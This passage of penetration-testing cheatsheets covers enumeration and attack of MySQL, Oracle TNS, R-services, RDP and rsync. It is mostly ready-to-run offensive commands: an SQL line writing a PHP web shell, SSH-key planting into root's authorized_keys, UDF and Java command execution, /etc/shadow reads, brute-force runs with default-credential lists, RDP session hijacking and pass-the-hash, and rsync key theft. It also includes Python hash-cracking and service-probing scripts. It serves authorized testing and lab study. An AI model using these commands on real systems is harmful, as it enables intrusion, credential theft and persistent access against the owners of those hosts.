nmap -p 3306 --script mysql-vuln-cve2012-2122 <ip>   # Auth bypass in old 5.1/5.5 builds (memcmp return value)
nmap -p 3306 --script mysql-* <ip>                   # All MySQL scripts
```

Enumeration Queries

```sql
-- Version and environment
SELECT version();
SELECT @@version;
SELECT user();
SELECT @@datadir;
SELECT @@basedir;
SELECT @@hostname;

-- Databases and tables
SHOW databases;
USE <database>;
SHOW tables;
DESCRIBE <table>;
SELECT * FROM <table> LIMIT 5;
SELECT table_schema, table_name FROM information_schema.tables;

-- Users and privileges
SELECT user, host, authentication_string FROM mysql.user;   -- 5.7+ ('*...' = mysql_native_password, crackable; '$A$...' = caching_sha2_password)
SELECT user, host, password FROM mysql.user;                -- older MySQL
SELECT * FROM information_schema.user_privileges;
SHOW GRANTS FOR '<user>'@'<host>';
SHOW GRANTS FOR CURRENT_USER();

-- Check FILE privilege
SELECT user, host, File_priv FROM mysql.user;
```

File Read / Write (Requires FILE Privilege)

LOAD_FILE() and INTO OUTFILE are both constrained by secure_file_priv: empty means unrestricted, a directory value confines reads and writes to that directory, NULL disables them. Files are read and written as the mysqld OS user, INTO OUTFILE refuses to overwrite an existing file, and the target directory must be writable by that user.

```sql
SHOW VARIABLES LIKE 'secure_file_priv';

-- Read files
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/etc/shadow');     -- only if mysqld runs as root or is in the shadow group
SELECT LOAD_FILE('C:/Windows/System32/drivers/etc/hosts');

-- Write files (web shell)
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

-- Write SSH key (fails if authorized_keys already exists)
SELECT 'ssh-rsa AAAA...' INTO OUTFILE '/root/.ssh/authorized_keys';
```

Brute Force

```bash
hydra -l root -P wordlist.txt mysql://<ip>
hydra -L users.txt -P wordlist.txt mysql://<ip>
medusa -h <ip> -u root -P wordlist.txt -M mysql
```

User-Defined Functions (UDF) for Privilege Escalation

Needs FILE privilege, a plugin_dir writable by mysqld, and the right to CREATE FUNCTION. The library is written with INTO DUMPFILE (raw bytes, unlike OUTFILE) from a hex-encoded copy of lib_mysqludf_sys; commands then run as the mysqld OS user.

```sql
-- Check where plugins load from (post-login)
SHOW variables LIKE 'plugin_dir';

-- Drop the malicious UDF .so/.dll into plugin dir via INTO DUMPFILE,
-- then create the function and execute OS commands
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id > /tmp/out');
```

Common Credentials to Try

| Username | Password |
| --- | --- |
| root | (blank) |
| root | root |
| root | password |
| root | mysql |
| root | toor |
| admin | admin |

2 min · d3vilsec

Oracle TNS

Oracle TNS Enumeration Cheatsheet

Default port: 1521 (TCP; listeners are also commonly found on 1522-1529)

Nmap Scripts

```bash
nmap -p 1521 --script oracle-tns-version <ip>
nmap -p 1521 --script oracle-sid-brute <ip>
nmap -p 1521 --script oracle-brute <ip>
nmap -p 1521 --script oracle-brute-stealth <ip>    # O5LOGON: grabs session keys for offline cracking instead of failing logins
nmap -p 1521 --script oracle-enum-users \
     --script-args oracle-enum-users.sid=<sid> <ip>
```

ODAT (Oracle Database Attacking Tool)

```bash
# Full automated scan
odat all -s <ip> -p 1521

# SID brute force
odat sidguesser -s <ip> -p 1521

# Password brute force (after getting SID)
odat passwordguesser -s <ip> -p 1521 -d <sid>

# File read/write (requires UTL_FILE privilege)
odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd /tmp/passwd.txt
odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --putFile /tmp shell.php shell.php   # remote dir, remote name, local file

# OS command execution (requires Java in the database)
odat java -s <ip> -d <sid> -U <user> -P <pass> --exec "whoami"

# External table method for file read
odat externaltable -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd
```

sqlplus (Direct Connection)

Easy Connect (`host:port/name`) takes a service name. On XE and default installs the service name equals the SID, so `/<sid>` works; when it does not, use a full connect descriptor with SID=.

```bash
# Install: sudo apt install oracle-instantclient-sqlplus (Instant Client from Oracle; package name varies by distro)

# Connect
sqlplus <user>/<pass>@<ip>:<port>/<sid>
sqlplus <user>/<pass>@<ip>:<port>/<sid> as sysdba
sqlplus <user>/<pass>@//<ip>:<port>/<service_name>
sqlplus <user>/<pass>@"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=<ip>)(PORT=<port>))(CONNECT_DATA=(SID=<sid>)))"
```

Common SIDs to Try

XE, ORCL, DB, DATABASE, PROD, TEST, DEV, ORACLE, OEMREP, ORACLR_CONNECTION_DATA

Enumeration Queries (Once Connected)

```sql
-- Version and user
SELECT * FROM v$version;
SELECT user FROM dual;
SELECT * FROM session_privs;

-- Database objects
SELECT * FROM all_tables;
SELECT owner, table_name FROM all_tables WHERE owner != 'SYS';
SELECT column_name, data_type FROM all_tab_columns WHERE table_name = '<TABLE>';

-- Users and privileges
SELECT username FROM dba_users;
SELECT * FROM user_role_privs;
SELECT * FROM dba_sys_privs WHERE grantee = '<user>';

-- Password hashes (as SYSDBA)
SELECT name, password FROM sys.user$;   -- pre-11g DES-based hash (username-salted, case-insensitive)
SELECT name, spare4 FROM sys.user$;     -- 11g+: 'S:' SHA-1(password || salt); 12c+ adds 'T:' PBKDF2-SHA512

-- Check for DBA role (session_privs lists system privileges, not roles)
SELECT * FROM user_role_privs WHERE granted_role = 'DBA';
SELECT * FROM session_privs WHERE privilege = 'CREATE SESSION';   -- confirms only that you can log in
```

Privilege Escalation via Java

dbms_java.grant_permission needs to be run by a DBA (or a user holding the JAVA_ADMIN role); the runjava wrapper call works on releases where oracle/aurora/util/Wrapper is present.

```sql
-- Grant Java permissions (as DBA)
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');

-- Execute OS command via Java
SELECT dbms_java.runjava('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/out"') FROM dual;
```

Brute Force

```bash
hydra -l <user> -P wordlist.txt -s 1521 oracle://<ip>/<sid>
nmap -p 1521 --script oracle-brute \
     --script-args oracle-brute.sid=<sid> <ip>
```

Default Credentials

| Username | Password | Notes |
| --- | --- | --- |
| sys | change_on_install | connect as sysdba |
| system | manager | |
| scott | tiger | Classic demo user |
| dbsnmp | dbsnmp | SNMP agent |
| mdsys | mdsys | |
| hr | hr | |
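Both the MySQL cheatsheet (`SELECT user, host, authentication_string FROM mysql.user`) and the Oracle one (`SELECT name, spare4 FROM sys.user$`) end with a hash dump, and the formats differ in a way that matters: mysql_native_password is unsalted double SHA-1, so a hash can be checked against a wordlist or looked up across servers, while Oracle 11g's `S:` entry is SHA-1 over the password plus a 10-byte salt carried in the same field. This added example, not from either cheatsheet, implements both formats and cracks constructed dump rows with them; the rows are generated by the code from known passwords (the defaults listed on the page), so nothing here is a real hash from a real system.

```python
"""Verify MySQL mysql_native_password and Oracle 11g 'S:' hashes offline."""
import hashlib
import os


def mysql_native_password(password):
    """'*' + SHA1(SHA1(password)) in upper-case hex. Unsalted: same password, same hash everywhere.
    MySQL 8's default caching_sha2_password ('$A$...') is a different, salted scheme."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def oracle_11g_hash(password, salt=None):
    """spare4 'S:' entry: 'S:' + SHA1(password || salt) as 40 hex + the 10-byte salt as 20 hex."""
    salt = os.urandom(10) if salt is None else salt
    digest = hashlib.sha1(password.encode() + salt).hexdigest().upper()
    return "S:" + digest + salt.hex().upper()


def crack_mysql(hash_value, wordlist):
    target = hash_value.upper()
    for candidate in wordlist:
        if mysql_native_password(candidate) == target:
            return candidate
    return None


def crack_oracle_11g(spare4, wordlist):
    """spare4 may hold several 'X:' entries separated by ';' (12c: 'S:...;T:...'); use the S: one."""
    entry = next((e for e in spare4.split(";") if e.startswith("S:")), None)
    if entry is None or len(entry) != 62:
        raise ValueError("no 11g S: entry in %r" % spare4)
    digest, salt = entry[2:42], bytes.fromhex(entry[42:62])
    for candidate in wordlist:
        if hashlib.sha1(candidate.encode() + salt).hexdigest().upper() == digest:
            return candidate
    return None


# Constructed dump rows, shaped like the two SELECTs on the cheatsheets.
MYSQL_ROWS = [("root", "localhost", mysql_native_password("toor")),
              ("app", "%", mysql_native_password("Summer2023"))]
ORACLE_ROWS = [("SCOTT", oracle_11g_hash("tiger")),
               ("DBSNMP", oracle_11g_hash("dbsnmp") + ";T:" + "0" * 160)]

WORDLIST = ["password", "root", "toor", "tiger", "dbsnmp", "Summer2023"]


def crack_dumps(mysql_rows=MYSQL_ROWS, oracle_rows=ORACLE_ROWS, wordlist=WORDLIST):
    """{ 'mysql:<user>' | 'oracle:<user>': password } for every row the wordlist resolves."""
    found = {}
    for user, _host, h in mysql_rows:
        pw = crack_mysql(h, wordlist)
        if pw:
            found["mysql:" + user] = pw
    for user, s4 in oracle_rows:
        pw = crack_oracle_11g(s4, wordlist)
        if pw:
            found["oracle:" + user] = pw
    return found


if __name__ == "__main__":
    print(crack_dumps())
```

For anything beyond a short default list hand the rows to hashcat (mode 300 for mysql_native_password, 112 for the Oracle 11g `S:` format); the functions above are there to show what those modes compute.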

2 min · d3vilsec

R Services

R-Services Enumeration Cheatsheet

Default ports: rexec 512 (TCP), rlogin 513 (TCP), rsh / rcp 514 (TCP), rpcbind / portmapper 111 (TCP/UDP)

Note: r-services send everything, credentials included, in cleartext. rsh and rlogin authenticate on the client's source address and claimed username alone (/etc/hosts.equiv and ~/.rhosts), which is why spoofable trust is the whole attack surface; rexec is the exception and always asks for a password. The servers also insist on a privileged client source port (below 1024), so run the client commands as root. Largely obsolete, still found on legacy Unix hosts and in lab networks.

Detection

```bash
nmap -p 512-514 <ip>
nmap -p 512-514 -sV <ip>
nmap -p 111 <ip>
```

rlogin

```bash
# Login as current user (the local username is sent as the remote one)
rlogin <ip>

# Login as specific user
rlogin -l <user> <ip>
```

rsh (Remote Shell)

```bash
# Execute command remotely
rsh <ip> <command>
rsh -l <user> <ip> whoami
rsh -l <user> <ip> cat /etc/passwd
rsh -l <user> <ip> /bin/bash
```

rexec (Remote Exec)

```bash
# rexec authenticates with a password, not trust files
rexec -l <user> -p <pass> <ip> <command>
rexec -l <user> -p <pass> <ip> id
```

rpcbind / Portmapper (Port 111)

```bash
# List all registered RPC services
rpcinfo -p <ip>

# List NFS exports (if NFS is running)
showmount -e <ip>

# Nmap
nmap -p 111 --script rpcinfo <ip>
nmap -p 111 --script nfs-ls <ip>
nmap -p 111 --script nfs-showmount <ip>
nmap -p 111 --script nfs-statfs <ip>
```

rwho / ruptime

These read the broadcasts collected by the local rwhod daemon, so they only work from a host on the same broadcast domain that runs rwhod.

```bash
# List logged-in users across trusted hosts
rwho

# Show uptime across trusted hosts
ruptime
```

Trust Files (Critical Targets)

These files define which hosts/users can connect without a password: ...
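The trust files are worth being able to read mechanically, because the evaluation order and the negation syntax decide who gets a passwordless shell. This is an added example, not code from the original cheatsheet: a small evaluator for the common subset of .rhosts / hosts.equiv syntax (`host [user]` per line, `+` as a wildcard, a leading `-` as a deny, `#` comments; netgroup entries such as `+@group` are treated as non-matching rather than looked up), plus an audit that flags unconditional trust lines. The file contents and host names are constructed for the example, and the semantics follow the rules documented for hosts.equiv(5) and ruserok: a match returns immediately, so a deny line only works if it precedes the `+` that would otherwise allow.

```python
"""Evaluate rsh/rlogin host-based trust from .rhosts / hosts.equiv entries."""


def _match(pattern, value):
    """'+' matches anything; otherwise case-insensitive exact match."""
    return pattern == "+" or pattern.lower() == value.lower()


def rhosts_allows(lines, remote_host, remote_user, local_user, is_hosts_equiv=False):
    """True if (remote_host, remote_user) may log in as local_user without a password.

    A bare 'host' line trusts remote_user == local_user from that host.
    A 'host user' line trusts that remote user (as the file's owner for .rhosts, as
    any non-root local user for hosts.equiv). A leading '-' on either field makes the
    line a deny. hosts.equiv never grants root. First matching line wins."""
    if is_hosts_equiv and local_user == "root":
        return False
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host.lstrip("-+").startswith("@") or (user and user.lstrip("-+").startswith("@")):
            continue  # netgroups are not modelled here
        deny = host.startswith("-") or (user is not None and user.startswith("-"))
        if not _match(host.lstrip("-"), remote_host):
            continue
        if user is None:
            if remote_user != local_user:
                continue
        elif not _match(user.lstrip("-"), remote_user):
            continue
        return not deny
    return False


def audit(rhosts, hosts_equiv):
    """Flag lines that trust every host ('+' or '+ +'), the classic legacy-box finding."""
    findings = []
    for src, lines in (("~/.rhosts", rhosts), ("/etc/hosts.equiv", hosts_equiv)):
        for raw in lines:
            fields = raw.split("#", 1)[0].split()
            if fields and fields[0] == "+":
                findings.append("%s: '%s' trusts every host" % (src, " ".join(fields)))
    return findings


# Constructed trust files, as found on a legacy host.
ROOT_RHOSTS = [
    "# trusted admin workstation",
    "mgmt01.corp.local",        # root from mgmt01 -> root here
    "-build02 jenkins",         # explicit deny for jenkins@build02 ...
    "+ +",                      # ... and then everyone else from everywhere
]
HOSTS_EQUIV = [
    "-intruder.corp.local",     # deny must come before the wildcard to have any effect
    "+",
]

if __name__ == "__main__":
    print(rhosts_allows(ROOT_RHOSTS, "mgmt01.corp.local", "root", "root"))
    print(rhosts_allows(ROOT_RHOSTS, "build02", "jenkins", "root"))
    print(rhosts_allows(ROOT_RHOSTS, "build02", "bob", "root"))
    print(rhosts_allows(HOSTS_EQUIV, "intruder.corp.local", "bob", "bob", is_hosts_equiv=True))
    print(audit(ROOT_RHOSTS, HOSTS_EQUIV))
```

Because the server matches the source address against the host field, "trusted host" means whatever address the packet appears to come from; that is the property the cheatsheet's note about IP-based trust refers to.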

2 min · d3vilsec

RDP

RDP Enumeration Cheatsheet

Default port: 3389 (TCP)

Detection & Info Gathering

```bash
nmap -p 3389 -sV <ip>
nmap -p 3389 --script rdp-enum-encryption <ip>
nmap -p 3389 --script rdp-vuln-ms12-020 <ip>
nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info <ip>   # rdp-ntlm-info leaks hostname, domain and OS build
```

Check NLA (Network Level Auth)

With NLA the server demands CredSSP authentication before any session is created, so the login screen is never shown to an unauthenticated client and pre-auth bugs in the session code (BlueKeep) are not reachable. The negotiation happens in the first X.224 exchange: a client offering only standard RDP security gets a negotiation failure of HYBRID_REQUIRED_BY_SERVER.

```bash
nmap -p 3389 --script rdp-enum-encryption <ip>
# Look for a "CredSSP (NLA): SUCCESS" line under the security layer results

# rdp_check.py (impacket) tests whether a credential is accepted, without opening a session
python3 rdp_check.py <domain>/<user>:<pass>@<ip>
```

Password Attacks

RDP logins are slow and trigger lockout policies; keep thread counts low and check the domain lockout threshold first.

```bash
# Hydra
hydra -l <user> -P wordlist.txt rdp://<ip>
hydra -L users.txt -P wordlist.txt rdp://<ip>
hydra -l <user> -P wordlist.txt rdp://<ip> -t 4      # Limit threads (RDP drops parallel connections)

# Crowbar
crowbar -b rdp -s <ip>/32 -u <user> -C wordlist.txt
crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt

# Metasploit
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <ip>
run
```

Connecting via Linux

```bash
# xfreerdp (recommended)
xfreerdp /u:<user> /p:<pass> /v:<ip>
xfreerdp /u:<user> /p:<pass> /v:<ip> /d:<domain>
xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/tmp   # Mount local dir as a drive in the session
xfreerdp /u:<user> /p:<pass> /v:<ip> /cert-ignore         # Ignore cert errors
xfreerdp /u:<user> /pth:<nthash> /v:<ip>                  # Pass-the-Hash (needs Restricted Admin mode enabled on the target; /h: is window height, not the hash)

# rdesktop
rdesktop <ip>
rdesktop -u <user> -p <pass> -d <domain> <ip>

# Remmina (GUI)
remmina -c rdp://<user>@<ip>
```

Session Hijacking (Post-Exploitation)

tscon must run as SYSTEM (for example through a service or `psexec -s`); it attaches a disconnected session to yours without the other user's password.

```
# List sessions (on Windows target)
query session
query user

# Hijack disconnected session (as SYSTEM); <current_session> is your own session name, e.g. console or rdp-tcp#2
tscon <session_id> /dest:<current_session>
```

Key Vulnerabilities

| CVE | Name | Affected Systems | Description |
| --- | --- | --- | --- |
| CVE-2019-0708 | BlueKeep | Windows XP, 7, Server 2003, 2008, 2008 R2 | Pre-auth RCE via RDP (use-after-free in the MS_T120 channel); wormable, blocked by NLA |
| CVE-2019-1181 | DejaBlue | Windows 7 SP1 through 10, Server 2008 R2 through 2019 | Pre-auth RCE via RDP, separate bug from BlueKeep |
| CVE-2019-1182 | DejaBlue | Windows 7 SP1 through 10, Server 2008 R2 through 2019 | Pre-auth RCE via RDP, separate bug from BlueKeep |
| CVE-2012-0002 | MS12-020 | Windows XP through 7, Server 2003 through 2008 R2 | Pre-auth DoS, potential code execution |

BlueKeep Check (Metasploit)

```
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <ip>
run
```

Useful Options

```bash
# Custom RDP port
xfreerdp /u:<user> /p:<pass> /v:<ip>:<port>

# Enable clipboard sharing
xfreerdp /u:<user> /p:<pass> /v:<ip> +clipboard

# Full screen
xfreerdp /u:<user> /p:<pass> /v:<ip> /f

# Dynamic resolution
xfreerdp /u:<user> /p:<pass> /v:<ip> /dynamic-resolution
```
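The NLA check above, done at the protocol level rather than read off nmap's output. This is an added example, not code from the original cheatsheet or from nmap's rdp-enum-encryption script: it builds the X.224 Connection Request that opens every RDP connection (TPKT header, X.224 CR, and an RDP Negotiation Request listing the security protocols the client will accept) and parses the server's Connection Confirm. Offering only standard RDP security forces an NLA-enforcing server to answer with a Negotiation Failure of HYBRID_REQUIRED_BY_SERVER; a TLS-only server answers SSL_REQUIRED_BY_SERVER; a server that accepts the offer answers with a Negotiation Response. The framing follows MS-RDPBCGR sections 2.2.1.1 and 2.2.1.2, and the server replies used in the offline demo are constructed.

```python
"""X.224 Connection Request / Confirm exchange to detect NLA (CredSSP) enforcement on RDP."""
import socket
import struct

PROTOCOL_RDP = 0x00000000      # standard RDP security
PROTOCOL_SSL = 0x00000001      # TLS
PROTOCOL_HYBRID = 0x00000002   # CredSSP (NLA)

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols):
    """TPKT(4) + X.224 CR header(7) + rdpNegReq(8). Negotiation fields are little-endian."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224: LI = length after the LI byte (6 header bytes + payload), CR code 0xE0,
    # DST-REF, SRC-REF, class 0.
    x224 = struct.pack("!BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    return struct.pack("!BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(data):
    """Describe the server's Connection Confirm (CC, X.224 code 0xD0)."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT packet")
    length = struct.unpack("!H", data[2:4])[0]
    if data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm (code 0x%02x)" % data[5])
    if length <= 11:
        # No negotiation structure: legacy server that only speaks standard RDP security.
        return {"type": None, "selected_protocol": PROTOCOL_RDP, "failure": None}
    ntype, _flags, nlen, value = struct.unpack("<BBHI", data[11:19])
    if nlen != 8:
        raise ValueError("unexpected negotiation structure length %d" % nlen)
    if ntype == TYPE_RDP_NEG_RSP:
        return {"type": "response", "selected_protocol": value, "failure": None}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"type": "failure", "selected_protocol": None,
                "failure": FAILURE_CODES.get(value, "UNKNOWN_%d" % value)}
    raise ValueError("unknown negotiation type %d" % ntype)


def nla_required(confirm):
    """True when the server rejects anything weaker than CredSSP."""
    return confirm["failure"] == "HYBRID_REQUIRED_BY_SERVER"


def probe(host, port=3389, timeout=5):
    """Live check: offer RDP security only, so an NLA-enforcing server must refuse."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request(PROTOCOL_RDP))
        data = s.recv(64)
    return parse_connection_confirm(data)


def constructed_confirm(ntype, value):
    """Server CC bytes, constructed for the offline demo (SRC-REF 0x1234 is arbitrary)."""
    neg = struct.pack("<BBHI", ntype, 0, 8, value)
    x224 = struct.pack("!BBHHB", 6 + len(neg), 0xD0, 0, 0x1234, 0) + neg
    return struct.pack("!BBH", 3, 0, 4 + len(x224)) + x224


if __name__ == "__main__":
    print(build_connection_request(PROTOCOL_RDP).hex())
    nla = parse_connection_confirm(constructed_confirm(TYPE_RDP_NEG_FAILURE, 5))
    print(nla, "NLA required:", nla_required(nla))
    print(parse_connection_confirm(constructed_confirm(TYPE_RDP_NEG_RSP, PROTOCOL_HYBRID)))
```

`probe("<ip>")` runs the same exchange against a host; the request it sends is the 19-byte `03 00 00 13 0e e0 ...` packet that every RDP client opens with, so it is indistinguishable from a normal connection attempt in server logs.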

2 min · d3vilsec

Rsync

Rsync Enumeration Cheatsheet

Default port: 873 (TCP, rsync daemon mode; rsync over SSH uses port 22 and exposes no module list)

Detection

```bash
nmap -p 873 <ip>
nmap -p 873 -sV <ip>
nmap -p 873 --script rsync-list-modules <ip>
nc -nv <ip> 873
```

List Available Modules (Shares)

```bash
# List modules (no auth)
rsync -av --list-only rsync://<ip>/
rsync rsync://<ip>/

# Manual protocol exchange: the daemon greets with "@RSYNCD: <version>"; answer with a
# version line of your own, then send "#list" to get one "name<TAB>comment" line per module
nc -nv <ip> 873
@RSYNCD: 31.0
#list
```

Modules configured with "list = no" are hidden from the listing but still reachable by name, which is what the guesses under High-Value Modules below are for.

Enumerate Files in a Module

```bash
rsync -av --list-only rsync://<ip>/<module>/
rsync -av --list-only rsync://<ip>/<module>/subdir/

# Recursive listing of entire module
rsync -r --list-only rsync://<ip>/<module>/
```

Download Files

```bash
# Download single file
rsync rsync://<ip>/<module>/file.txt ./

# Download entire module
rsync -av rsync://<ip>/<module>/ ./local_copy/

# With credentials (password is prompted for, or read from a file that must not be world-readable)
rsync -av rsync://<user>@<ip>/<module>/ ./
rsync --password-file=pass.txt rsync://<user>@<ip>/<module>/ ./

# Dry run (see what would be downloaded)
rsync -av --dry-run rsync://<ip>/<module>/ ./
```

Upload Files

Writes only succeed on modules with "read only = no". An upload overwrites whatever is at the destination path, so run the same command with --dry-run first.

```bash
# Upload single file
rsync -av ./shell.php rsync://<user>@<ip>/<module>/

# Upload directory
rsync -av ./payload/ rsync://<user>@<ip>/<module>/uploads/

# With password file
rsync --password-file=pass.txt -av ./file rsync://<user>@<ip>/<module>/
```

High-Value Modules to Check

Module names are whatever rsyncd.conf defines; these are common names worth trying when the listing is empty or hidden.

```bash
rsync -av --list-only rsync://<ip>/home/
rsync -av --list-only rsync://<ip>/root/
rsync -av --list-only rsync://<ip>/etc/
rsync -av --list-only rsync://<ip>/backup/
rsync -av --list-only rsync://<ip>/var/www/
rsync -av --list-only rsync://<ip>/.ssh/
```

SSH Key Theft & Planting

```bash
# Download .ssh directory
rsync -av rsync://<ip>/home/<user>/.ssh/ ./stolen_keys/

# Plant authorized_keys (if write access). This replaces the file: download the existing
# one first and append your key to it if you need the user's own access to keep working.
rsync -av ~/.ssh/id_rsa.pub rsync://<user>@<ip>/home/<user>/.ssh/authorized_keys
```

Nmap Scripts

```bash
nmap -p 873 --script rsync-list-modules <ip>
```
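The manual nc exchange above, implemented without the rsync binary, with a parser for the daemon's reply and a first-pass filter for modules worth opening. This is an added example, not code from the original cheatsheet: the client sends its protocol version line and `#list`, the daemon answers with its own version line, one `name<TAB>comment` line per visible module, and `@RSYNCD: EXIT`. The reply used in the offline demo is constructed; `list_modules` performs the same exchange against a live host.

```python
"""rsync daemon (port 873) module listing over the raw protocol, with offline parsing demo."""
import socket

CLIENT_VERSION = b"@RSYNCD: 31.0\n"


def parse_module_list(data):
    """(daemon_version, [(module, comment), ...]) from the raw bytes the daemon sent.
    '@RSYNCD:' lines are protocol; everything else before EXIT is a module line."""
    version = None
    modules = []
    for raw in data.decode("utf-8", errors="replace").split("\n"):
        line = raw.rstrip("\r")
        if not line:
            continue
        if line.startswith("@RSYNCD: "):
            token = line[len("@RSYNCD: "):]
            if token == "EXIT":
                break
            if version is None:
                version = token.split()[0]   # newer daemons append digest names after the version
            continue
        name, _, comment = line.partition("\t")
        modules.append((name.strip(), comment.strip()))
    return version, modules


def list_modules(host, port=873, timeout=5):
    """Live version of the handshake: send our version, request the list, read until EXIT."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(CLIENT_VERSION)
        s.sendall(b"#list\n")
        buf = b""
        while b"@RSYNCD: EXIT" not in buf:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return parse_module_list(buf)


def interesting_modules(modules, keywords=("home", "root", "backup", "etc", "www", "ssh", "conf")):
    """Module names whose name or comment hints at credentials, configuration or web roots."""
    hits = []
    for name, comment in modules:
        text = (name + " " + comment).lower()
        if any(k in text for k in keywords):
            hits.append(name)
    return hits


# Constructed daemon reply for the offline demo (the daemon pads names to 15 columns).
SAMPLE_REPLY = (b"@RSYNCD: 31.0\n"
                b"backup         \tNightly backups\n"
                b"www            \tWeb root\n"
                b"public         \tAnonymous downloads\n"
                b"@RSYNCD: EXIT\n")

if __name__ == "__main__":
    version, modules = parse_module_list(SAMPLE_REPLY)
    print(version, modules)
    print("worth opening:", interesting_modules(modules))
```

Anything `interesting_modules` returns is a candidate for `rsync -av --list-only rsync://<ip>/<module>/`; modules absent from the list may still exist if the server hides them, so the name guesses in the High-Value Modules section remain worthwhile after this.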

1 min · d3vilsec